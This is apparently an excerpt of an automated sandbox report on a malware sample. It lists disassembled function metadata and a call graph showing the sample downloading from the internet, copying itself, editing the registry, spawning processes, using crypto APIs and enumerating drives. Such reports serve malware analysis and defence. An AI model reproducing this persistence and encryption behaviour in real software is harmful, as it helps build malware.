                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                                  • String ID: vector<T> too long
                                                                                                  • API String ID: 1327501947-3788999226
                                                                                                  • Opcode ID: 02be215d632e5bf381765f44c78910b5607ea192a8cd9b8a618c8963d6c11c62
                                                                                                  • Instruction ID: 26ea15826ebf7d8122d0031273ada7a6bacf907b7610e6232d00b9ac0c2b4822
                                                                                                  • Opcode Fuzzy Hash: 02be215d632e5bf381765f44c78910b5607ea192a8cd9b8a618c8963d6c11c62
                                                                                                  • Instruction Fuzzy Hash: 8B01B5F25003009BD730AF1AE901757B7E8AF40B65F14883FE99993781E7B9E944C7A9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • Assertion failed: %s, file %s, line %d, xrefs: 00490E13
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __calloc_crt
                                                                                                  • String ID: Assertion failed: %s, file %s, line %d
                                                                                                  • API String ID: 3494438863-969893948
                                                                                                  • Opcode ID: 3d6cbe136384de80a824dc270dedc861eb560ea8a7409405e5c436b5a4429892
                                                                                                  • Instruction ID: 76da24454f312e652873a473bf0e2b66f37d219039a8a439ca81b56fb007753b
                                                                                                  • Opcode Fuzzy Hash: 3d6cbe136384de80a824dc270dedc861eb560ea8a7409405e5c436b5a4429892
                                                                                                  • Instruction Fuzzy Hash: 67F0AF713092119FEF248B79BC11A6A2FD4B721724B11083FF204DA680E73C8841A6EA
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 004F0686
                                                                                                    • Part of subcall function 004C4C00: _raise.LIBCMT ref: 004C4C18
                                                                                                  Strings
                                                                                                  • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 004F062E
                                                                                                  • .\crypto\evp\digest.c, xrefs: 004F0638
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset_raise
                                                                                                  • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                  • API String ID: 1484197835-3867593797
                                                                                                  • Opcode ID: 3bd010f3ee3b9a5b176e3bcf564a28218717004b2d9da324f39afde47deadd6c
                                                                                                  • Instruction ID: 4aa05c0a28ab8464a7cbf90211d32f0acd5169b8268a81676812c2d8ea47236a
                                                                                                  • Opcode Fuzzy Hash: 3bd010f3ee3b9a5b176e3bcf564a28218717004b2d9da324f39afde47deadd6c
                                                                                                  • Instruction Fuzzy Hash: FF018B35600200AFD710DF09EC42E26B7E5AFC8304F19442DF688CB362D761EC558B99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • std::exception::exception.LIBCMT ref: 004BF251
                                                                                                    • Part of subcall function 004A0CFC: std::exception::_Copy_str.LIBCMT ref: 004A0D15
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 004BF266
                                                                                                    • Part of subcall function 004A0ECA: RaiseException.KERNEL32(?,?,004BF299,?,?,?,?,?,?,?,004BF299,?,00578238,?), ref: 004A0F1F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                                  • String ID: TeT
                                                                                                  • API String ID: 757275642-3765982577
                                                                                                  • Opcode ID: 96dd6b462fba55718c6c44bd08e01fa82ca477ab8fcf6e83f825799c989e6388
                                                                                                  • Instruction ID: 36ea401ecdc0d3c200e2d13bdfe37b135e4ba8821c5770de424990d43b878183
                                                                                                  • Opcode Fuzzy Hash: 96dd6b462fba55718c6c44bd08e01fa82ca477ab8fcf6e83f825799c989e6388
                                                                                                  • Instruction Fuzzy Hash: D6D01774C0020CBBCB00EFA5C489CCEBBB8AA01308B408466AD1497241EA74A3098B85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:7%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:2000
                                                                                                  Total number of Limit Nodes:210
                                                                                                  execution_graph 38753 e43f84 38754 e43f90 __setmbcp 38753->38754 38790 e52603 GetStartupInfoW 38754->38790 38757 e43f95 38792 e478d5 GetProcessHeap 38757->38792 38758 e43fed 38759 e43ff8 38758->38759 39121 e4411a 58 API calls 3 library calls 38758->39121 38793 e45141 38759->38793 38762 e43ffe 38763 e44009 __RTC_Initialize 38762->38763 39122 e4411a 58 API calls 3 library calls 38762->39122 38814 e48754 38763->38814 38766 e44018 38767 e44024 GetCommandLineW 38766->38767 39123 e4411a 58 API calls 3 library calls 38766->39123 38833 e5235f GetEnvironmentStringsW 38767->38833 38771 e44023 38771->38767 38773 e4403e 38774 e44049 38773->38774 39124 e47c2e 58 API calls 3 library calls 38773->39124 38843 e521a1 38774->38843 38778 e4405a 38857 e47c68 38778->38857 38781 e44062 38782 e4406d __wwincmdln 38781->38782 39126 e47c2e 58 API calls 3 library calls 38781->39126 38863 e39f90 38782->38863 38785 e44081 38786 e44090 38785->38786 39127 e47f3d 58 API calls _doexit 38785->39127 39128 e47c59 58 API calls _doexit 38786->39128 38789 e44095 __setmbcp 38791 e52619 38790->38791 38791->38757 38792->38758 39129 e47d6c 36 API calls 2 library calls 38793->39129 38795 e45146 39130 e48c48 InitializeCriticalSectionAndSpinCount __mtinitlocks 38795->39130 38797 e4514b 38798 e4514f 38797->38798 39132 e524f7 TlsAlloc 38797->39132 39131 e451b7 61 API calls 2 library calls 38798->39131 38801 e45154 38801->38762 38802 e45161 38802->38798 38803 e4516c 38802->38803 39133 e48c96 38803->39133 38806 e451ae 39141 e451b7 61 API calls 2 library calls 38806->39141 38809 e4518d 38809->38806 38811 e45193 38809->38811 38810 e451b3 38810->38762 39140 e4508e 58 API calls 4 library calls 38811->39140 38813 e4519b GetCurrentThreadId 38813->38762 38815 e48760 __setmbcp 38814->38815 39180 e48af7 38815->39180 38817 e48767 38818 e48c96 __calloc_crt 58 API calls 38817->38818 38819 e48778 38818->38819 38820 e487e3 GetStartupInfoW 38819->38820 38821 e48783 @_EH4_CallFilterFunc@8 __setmbcp 38819->38821 38827 e487f8 38820->38827 38830 e48927 38820->38830 38821->38766 38822 e489ef 39189 e489ff LeaveCriticalSection _doexit 38822->39189 38824 e48c96 __calloc_crt 58 API calls 38824->38827 38825 e48974 GetStdHandle 38825->38830 38826 e48987 GetFileType 38826->38830 38827->38824 38828 e48846 38827->38828 38827->38830 38829 e4887a GetFileType 38828->38829 38828->38830 39187 e5263e InitializeCriticalSectionAndSpinCount 38828->39187 38829->38828 38830->38822 38830->38825 38830->38826 39188 e5263e InitializeCriticalSectionAndSpinCount 38830->39188 38834 e44034 38833->38834 38835 e52370 38833->38835 38839 e51f64 GetModuleFileNameW 38834->38839 38836 e48cde __malloc_crt 58 API calls 38835->38836 38837 e52396 ___check_float_string 38836->38837 38838 e523ac FreeEnvironmentStringsW 38837->38838 38838->38834 38840 e51f98 _wparse_cmdline 38839->38840 38841 e48cde __malloc_crt 58 API calls 38840->38841 38842 e51fd8 _wparse_cmdline 38840->38842 38841->38842 38842->38773 38844 e4404f 38843->38844 38845 e521ba _TestDefaultLanguage 38843->38845 38844->38778 39125 e47c2e 58 API calls 3 library calls 38844->39125 38846 e48c96 __calloc_crt 58 API calls 38845->38846 38850 e521e3 _TestDefaultLanguage 38846->38850 38847 e5223a 38848 e40bed _free 58 API calls 38847->38848 38848->38844 38849 e48c96 __calloc_crt 58 API calls 38849->38850 38850->38844 38850->38847 38850->38849 38851 e5225f 38850->38851 38854 e52276 38850->38854 39249 e4962f 58 API calls __strtod_l 38850->39249 38852 e40bed _free 58 API calls 38851->38852 38852->38844 39250 e442fd 8 API calls 2 library calls 38854->39250 38856 e52282 38859 e47c74 __IsNonwritableInCurrentImage 38857->38859 39251 e5aeb5 38859->39251 38860 e47c92 __initterm_e 38862 e47cb1 __cinit __IsNonwritableInCurrentImage 38860->38862 39254 e419ac 38860->39254 38862->38781 38864 e39fa0 __ftell_nolock 38863->38864 39289 e2cf10 38864->39289 38866 e39fb0 38867 e39fc4 GetCurrentProcess GetLastError SetPriorityClass 38866->38867 38868 e39fb4 38866->38868 38870 e39fe6 38867->38870 38871 e39fe4 GetLastError 38867->38871 39716 e324e0 109 API calls _memset 38868->39716 39303 e3d3c0 38870->39303 38871->38870 38872 e39fb9 38872->38785 38875 e3a022 39306 e3d340 38875->39306 38876 e3b669 39749 e6f23e 59 API calls 2 library calls 38876->39749 38878 e3b673 39750 e6f23e 59 API calls 2 library calls 38878->39750 38883 e3a065 39311 e33a90 38883->39311 38887 e3a159 GetCommandLineW CommandLineToArgvW lstrcpyW 38889 e3a33d GlobalFree 38887->38889 38903 e3a196 38887->38903 38888 e3a100 38888->38887 38890 e3a354 38889->38890 38891 e3a45c 38889->38891 38893 e32220 76 API calls 38890->38893 39367 e32220 38891->39367 38894 e3a359 38893->38894 38896 e3a466 38894->38896 39382 e2ef50 38894->39382 38895 e3a1cc lstrcmpW lstrcmpW 38895->38903 38896->38785 38897 e40235 60 API calls ___get_qualified_locale 38897->38903 38899 e3a24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 38899->38903 38900 e3a48f 38902 e3a4ef 38900->38902 39387 e33ea0 38900->39387 38904 e31cd0 92 API calls 38902->38904 38903->38889 38903->38895 38903->38897 38903->38899 38905 e3a361 38903->38905 38907 e3a563 38904->38907 39327 e43c92 38905->39327 38910 e3a57e 38907->38910 38918 e3a5f5 38907->38918 38909 e3a395 OpenProcess 38911 e3a402 38909->38911 38912 e3a3a9 WaitForSingleObject CloseHandle 38909->38912 39722 e34690 38910->39722 39330 e31cd0 38911->39330 38912->38911 38916 e3a3cb 38912->38916 38913 e3a6f9 39746 e31a10 8 API calls 38913->39746 38932 e3a3e2 GlobalFree 38916->38932 38933 e3a3d4 Sleep 38916->38933 39717 e31ab0 PeekMessageW 38916->39717 38917 e3a6fe 38921 e3a8b6 CreateMutexA 38917->38921 38922 e3a70f 38917->38922 38918->38913 38918->38917 38941 e3a5db 38918->38941 38919 e3a5a9 38924 e34690 59 API calls 38919->38924 38927 e3a8ca 38921->38927 38926 e3a7dc 38922->38926 38937 e2ef50 58 API calls 38922->38937 38929 e3a5d4 38924->38929 38925 e3a40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 38930 e3a451 38925->38930 38934 e2ef50 58 API calls 38926->38934 38931 e2ef50 58 API calls 38927->38931 38928 e3a624 GetVersion 38928->38913 38935 e3a632 lstrcpyW lstrcatW lstrcatW 38928->38935 39745 e2d240 132 API calls 4 library calls 38929->39745 38930->38785 38945 e3a8da 38931->38945 38938 e3a3f7 38932->38938 38933->38909 38939 e3a7ec 38934->38939 38940 e3a674 _memset 38935->38940 38948 e3a72f 38937->38948 38938->38785 38942 e3a7f1 lstrlenA 38939->38942 38944 e3a6b4 ShellExecuteExW 38940->38944 38941->38918 38941->38921 38941->38928 38943 e40c62 _malloc 58 API calls 38942->38943 38946 e3a810 _memset 38943->38946 38944->38917 38947 e3a6e3 38944->38947 38949 e33ea0 59 API calls 38945->38949 38962 e3a92f 38945->38962 38951 e3a81e MultiByteToWideChar lstrcatW 38946->38951 38965 e3a9d1 38947->38965 38950 e33ea0 59 API calls 38948->38950 38953 e3a780 38948->38953 38949->38945 38950->38948 38951->38942 38952 e3a847 lstrlenW 38951->38952 38954 e3a8a0 CreateMutexA 38952->38954 38955 e3a856 38952->38955 38956 e3a792 38953->38956 38957 e3a79c CreateThread 38953->38957 38954->38927 39408 e2e760 38955->39408 38959 e33ff0 59 API calls 38956->38959 38957->38926 38961 e3a7d0 38957->38961 41130 e3dbd0 95 API calls 4 library calls 38957->41130 38959->38957 38960 e3a860 CreateThread WaitForSingleObject 38960->38954 41061 e3e690 38960->41061 38961->38926 39419 e35c10 38962->39419 38964 e3a98c 39432 e32840 38964->39432 38965->38785 38967 e3a997 39437 e30fc0 CryptAcquireContextW 38967->39437 38969 e3a9ab 38970 e3a9c2 lstrlenA 38969->38970 38970->38965 38971 e3a9d8 38970->38971 38972 e35c10 59 API calls 38971->38972 38973 e3aa23 38972->38973 38974 e32840 60 API calls 38973->38974 38975 e3aa2e lstrcpyA 38974->38975 38977 e3aa4b 38975->38977 38978 e35c10 59 API calls 38977->38978 38979 e3aa90 38978->38979 38980 e2ef50 58 API calls 38979->38980 38981 e3aaa0 38980->38981 38981->38981 38982 e33ea0 59 API calls 38981->38982 38983 e3aaf5 38981->38983 38982->38981 39460 e33ff0 38983->39460 38985 e3ab1d 39487 e32900 38985->39487 38987 e2ef50 58 API calls 38989 e3abc5 38987->38989 38988 e3ab28 _memmove 38988->38987 38990 e33ea0 59 API calls 38989->38990 38991 e3ac1e 38989->38991 38990->38989 38992 e33ff0 59 API calls 38991->38992 38993 e3ac46 38992->38993 38994 e32900 60 API calls 38993->38994 38996 e3ac51 _memmove 38994->38996 38995 e2ef50 58 API calls 38997 e3acee 38995->38997 38996->38995 38998 e33ea0 59 API calls 38997->38998 38999 e3ad43 38997->38999 38998->38997 39000 e33ff0 59 API calls 38999->39000 39001 e3ad6b 39000->39001 39002 e32900 60 API calls 39001->39002 39005 e3ad76 _memmove 39002->39005 39003 e35c10 59 API calls 39004 e3ae2a 39003->39004 39492 e33580 39004->39492 39005->39003 39007 e3ae3c 39008 e35c10 59 API calls 39007->39008 39009 e3ae76 39008->39009 39010 e33580 59 API calls 39009->39010 39011 e3ae82 39010->39011 39012 e35c10 59 API calls 39011->39012 39013 e3aebc 39012->39013 39014 e33580 59 API calls 39013->39014 39015 e3aec8 39014->39015 39016 e35c10 59 API calls 39015->39016 39017 e3af02 39016->39017 39018 e33580 59 API calls 39017->39018 39019 e3af0e 39018->39019 39020 e35c10 59 API calls 39019->39020 39021 e3af48 39020->39021 39022 e33580 59 API calls 39021->39022 39023 e3af54 39022->39023 39024 e35c10 59 API calls 39023->39024 39025 e3af8e 39024->39025 39026 e33580 59 API calls 39025->39026 39027 e3af9a 39026->39027 39028 e35c10 59 API calls 39027->39028 39029 e3afd4 39028->39029 39030 e33580 59 API calls 39029->39030 39031 e3afe0 39030->39031 39499 e33100 39031->39499 39033 e3b001 39034 e33580 59 API calls 39033->39034 39035 e3b025 39034->39035 39036 e33100 59 API calls 39035->39036 39037 e3b03c 39036->39037 39038 e33580 59 API calls 39037->39038 39039 e3b059 39038->39039 39040 e33100 59 API calls 39039->39040 39041 e3b070 39040->39041 39042 e33580 59 API calls 39041->39042 39043 e3b07c 39042->39043 39044 e33100 59 API calls 39043->39044 39045 e3b093 39044->39045 39046 e33580 59 API calls 39045->39046 39047 e3b09f 39046->39047 39048 e33100 59 API calls 39047->39048 39049 e3b0b6 39048->39049 39050 e33580 59 API calls 39049->39050 39051 e3b0c2 39050->39051 39052 e33100 59 API calls 39051->39052 39053 e3b0d9 39052->39053 39054 e33580 59 API calls 39053->39054 39055 e3b0e5 39054->39055 39056 e33100 59 API calls 39055->39056 39057 e3b0fc 39056->39057 39058 e33580 59 API calls 39057->39058 39059 e3b108 39058->39059 39061 e3b130 39059->39061 39747 e3cdd0 59 API calls 39059->39747 39062 e2ef50 58 API calls 39061->39062 39063 e3b16e 39062->39063 39065 e3b1a5 GetUserNameW 39063->39065 39506 e32de0 39063->39506 39066 e3b1c9 39065->39066 39513 e32c40 39066->39513 39068 e3b1d8 39520 e32bf0 39068->39520 39072 e3b2f5 39531 e336c0 39072->39531 39076 e3b311 39547 e330b0 39076->39547 39079 e32c40 59 API calls 39093 e3b1f3 39079->39093 39081 e32900 60 API calls 39081->39093 39082 e3b327 39574 e311c0 CreateFileW 39082->39574 39083 e33580 59 API calls 39083->39093 39085 e3b33b 39659 e3ba10 LoadCursorW RegisterClassExW 39085->39659 39087 e33100 59 API calls 39087->39093 39088 e3b343 39660 e3ba80 CreateWindowExW 39088->39660 39090 e3b34b 39090->38965 39663 e30a50 GetLogicalDrives 39090->39663 39093->39072 39093->39079 39093->39081 39093->39083 39093->39087 39748 e2f1f0 59 API calls 39093->39748 39094 e3b379 39095 e33100 59 API calls 39094->39095 39096 e3b3a5 39095->39096 39097 e33580 59 API calls 39096->39097 39120 e3b3b3 39097->39120 39098 e3b48b 39715 e3fdc0 CreateThread 39098->39715 39100 e3b49f GetMessageW 39101 e3b4bf 39100->39101 39102 e3b4ed 39100->39102 39103 e3b4c5 TranslateMessage DispatchMessageW GetMessageW 39101->39103 39105 e3b502 PostThreadMessageW 39102->39105 39106 e3b55b 39102->39106 39103->39102 39103->39103 39107 e3b510 PeekMessageW 39105->39107 39108 e3b564 PostThreadMessageW 39106->39108 39109 e3b5bb 39106->39109 39110 e3b546 WaitForSingleObject 39107->39110 39111 e3b526 DispatchMessageW PeekMessageW 39107->39111 39112 e3b570 PeekMessageW 39108->39112 39109->38965 39115 e3b5d2 CloseHandle 39109->39115 39110->39106 39110->39107 39111->39110 39111->39111 39113 e3b5a6 WaitForSingleObject 39112->39113 39114 e3b586 DispatchMessageW PeekMessageW 39112->39114 39113->39109 39113->39112 39114->39113 39114->39114 39115->38965 39120->39098 39673 e3c330 39120->39673 39679 e3c240 39120->39679 39685 e3b8b0 39120->39685 39707 e33260 39120->39707 39714 e3fa10 CreateThread 39120->39714 39121->38759 39122->38763 39123->38771 39127->38786 39128->38789 39129->38795 39130->38797 39131->38801 39132->38802 39135 e48c9d 39133->39135 39136 e45179 39135->39136 39138 e48cbb 39135->39138 39142 e5b813 39135->39142 39136->38806 39139 e52553 TlsSetValue 39136->39139 39138->39135 39138->39136 39150 e529c9 Sleep 39138->39150 39139->38809 39140->38813 39141->38810 39143 e5b81e 39142->39143 39148 e5b839 39142->39148 39144 e5b82a 39143->39144 39143->39148 39151 e45208 39144->39151 39146 e5b849 HeapAlloc 39147 e5b82f 39146->39147 39146->39148 39147->39135 39148->39146 39148->39147 39154 e4793d DecodePointer 39148->39154 39150->39138 39155 e4501f GetLastError 39151->39155 39153 e4520d 39153->39147 39154->39148 39169 e52534 39155->39169 39157 e45034 39158 e45082 SetLastError 39157->39158 39159 e48c96 __calloc_crt 55 API calls 39157->39159 39158->39153 39160 e45047 39159->39160 39160->39158 39172 e52553 TlsSetValue 39160->39172 39162 e4505b 39163 e45061 39162->39163 39164 e45079 39162->39164 39173 e4508e 58 API calls 4 library calls 39163->39173 39174 e40bed 39164->39174 39167 e45069 GetCurrentThreadId 39167->39158 39168 e4507f 39168->39158 39170 e52547 39169->39170 39171 e5254b TlsGetValue 39169->39171 39170->39157 39171->39157 39172->39162 39173->39167 39175 e40bf6 HeapFree 39174->39175 39176 e40c1f _free 39174->39176 39175->39176 39177 e40c0b 39175->39177 39176->39168 39178 e45208 __strtod_l 56 API calls 39177->39178 39179 e40c11 GetLastError 39178->39179 39179->39176 39181 e48b08 39180->39181 39182 e48b1b EnterCriticalSection 39180->39182 39190 e48b9f 39181->39190 39182->38817 39184 e48b0e 39184->39182 39214 e47c2e 58 API calls 3 library calls 39184->39214 39187->38828 39188->38830 39189->38821 39191 e48bab __setmbcp 39190->39191 39192 e48bb4 39191->39192 39193 e48bcc 39191->39193 39215 e47f51 58 API calls 2 library calls 39192->39215 39201 e48bed __setmbcp 39193->39201 39218 e48cde 39193->39218 39196 e48bb9 39216 e47fae 58 API calls 10 library calls 39196->39216 39199 e48bf7 39205 e48af7 __lock 58 API calls 39199->39205 39200 e48be8 39204 e45208 __strtod_l 58 API calls 39200->39204 39201->39184 39202 e48bc0 39217 e47b0b GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 39202->39217 39204->39201 39207 e48bfe 39205->39207 39208 e48c23 39207->39208 39209 e48c0b 39207->39209 39210 e40bed _free 58 API calls 39208->39210 39224 e5263e InitializeCriticalSectionAndSpinCount 39209->39224 39212 e48c17 39210->39212 39225 e48c3f LeaveCriticalSection _doexit 39212->39225 39215->39196 39216->39202 39221 e48cec 39218->39221 39220 e48be1 39220->39199 39220->39200 39221->39220 39223 e48cff 39221->39223 39226 e40c62 39221->39226 39223->39220 39223->39221 39243 e529c9 Sleep 39223->39243 39224->39212 39225->39201 39227 e40cdd 39226->39227 39239 e40c6e 39226->39239 39248 e4793d DecodePointer 39227->39248 39229 e40ce3 39230 e45208 __strtod_l 57 API calls 39229->39230 39242 e40cd5 39230->39242 39232 e40ca1 RtlAllocateHeap 39232->39239 39232->39242 39234 e40cc9 39237 e45208 __strtod_l 57 API calls 39234->39237 39240 e40cc7 39237->39240 39238 e40c79 39238->39239 39244 e47f51 58 API calls 2 library calls 39238->39244 39245 e47fae 58 API calls 10 library calls 39238->39245 39246 e47b0b GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 39238->39246 39239->39232 39239->39234 39239->39238 39239->39240 39247 e4793d DecodePointer 39239->39247 39241 e45208 __strtod_l 57 API calls 39240->39241 39241->39242 39242->39221 39243->39223 39244->39238 39245->39238 39247->39239 39248->39229 39249->38850 39250->38856 39252 e5aeb8 EncodePointer 39251->39252 39252->39252 39253 e5aed2 39252->39253 39253->38860 39257 e418b0 39254->39257 39256 e419b7 39256->38862 39258 e418bc __setmbcp 39257->39258 39265 e47dfc 39258->39265 39264 e418e3 __setmbcp 39264->39256 39266 e48af7 __lock 58 API calls 39265->39266 39267 e418c5 39266->39267 39268 e418f4 DecodePointer DecodePointer 39267->39268 39269 e41921 39268->39269 39270 e418d1 39268->39270 39269->39270 39282 e4a78d 59 API calls __strtod_l 39269->39282 39279 e418ee 39270->39279 39272 e41984 EncodePointer EncodePointer 39272->39270 39273 e41933 39273->39272 39274 e41958 39273->39274 39283 e48d25 61 API calls 2 library calls 39273->39283 39274->39270 39277 e41972 EncodePointer 39274->39277 39284 e48d25 61 API calls 2 library calls 39274->39284 39277->39272 39278 e4196c 39278->39270 39278->39277 39285 e47e05 39279->39285 39282->39273 39283->39274 39284->39278 39288 e48c81 LeaveCriticalSection 39285->39288 39287 e418f3 39287->39264 39288->39287 39290 e2cf32 _memset __ftell_nolock 39289->39290 39291 e2cf4f InternetOpenW 39290->39291 39292 e35c10 59 API calls 39291->39292 39293 e2cf8a InternetOpenUrlW 39292->39293 39294 e2cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 39293->39294 39302 e2cfb2 39293->39302 39751 e356d0 39294->39751 39296 e2d000 39297 e356d0 59 API calls 39296->39297 39298 e2d049 39297->39298 39298->39302 39770 e33010 59 API calls 39298->39770 39300 e2d084 39300->39302 39771 e33010 59 API calls 39300->39771 39302->38866 39774 e3ccc0 39303->39774 39794 e3cc50 39306->39794 39309 e3a04d 39309->38878 39309->38883 39312 e33ab2 39311->39312 39320 e33ad0 GetModuleFileNameW PathRemoveFileSpecW 39311->39320 39313 e33b00 39312->39313 39314 e33aba 39312->39314 39802 e6f23e 59 API calls 2 library calls 39313->39802 39316 e43b4c 59 API calls 39314->39316 39317 e33ac7 39316->39317 39317->39320 39803 e6f1bb 59 API calls 3 library calls 39317->39803 39321 e38400 39320->39321 39322 e38437 39321->39322 39326 e38446 39321->39326 39322->39326 39804 e35d50 39322->39804 39323 e384b9 39323->38888 39326->39323 39814 e38d50 59 API calls 39326->39814 39826 e51781 39327->39826 39842 e4f7c0 39330->39842 39333 e31d20 _memset 39335 e31d40 RegQueryValueExW RegCloseKey 39333->39335 39334 e31e6a 39334->38925 39336 e31d8f 39335->39336 39337 e35c10 59 API calls 39336->39337 39338 e31dbf 39337->39338 39339 e31dd1 lstrlenA 39338->39339 39340 e31e7c 39338->39340 39844 e33520 39339->39844 39342 e31e94 6 API calls 39340->39342 39343 e31e89 39340->39343 39344 e31ef5 UuidCreate UuidToStringW 39342->39344 39343->39342 39346 e31f36 39344->39346 39345 e31e3c PathFileExistsW 39345->39340 39347 e31e52 39345->39347 39346->39346 39348 e35c10 59 API calls 39346->39348 39347->39334 39351 e34690 59 API calls 39347->39351 39350 e31f59 RpcStringFreeW PathAppendW CreateDirectoryW 39348->39350 39349 e31df1 39349->39345 39352 e31f98 39350->39352 39354 e31fce 39350->39354 39351->39334 39353 e35c10 59 API calls 39352->39353 39353->39354 39355 e35c10 59 API calls 39354->39355 39356 e3201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 39355->39356 39357 e3207c _memset 39356->39357 39358 e321d1 39356->39358 39359 e32095 6 API calls 39357->39359 39358->39334 39360 e32115 _memset 39359->39360 39361 e32109 39359->39361 39363 e32125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 39360->39363 39362 e33260 59 API calls 39361->39362 39362->39360 39364 e321b2 39363->39364 39365 e321aa GetLastError 39363->39365 39366 e321c0 WaitForSingleObject 39364->39366 39365->39358 39366->39358 39366->39366 39368 e4f7c0 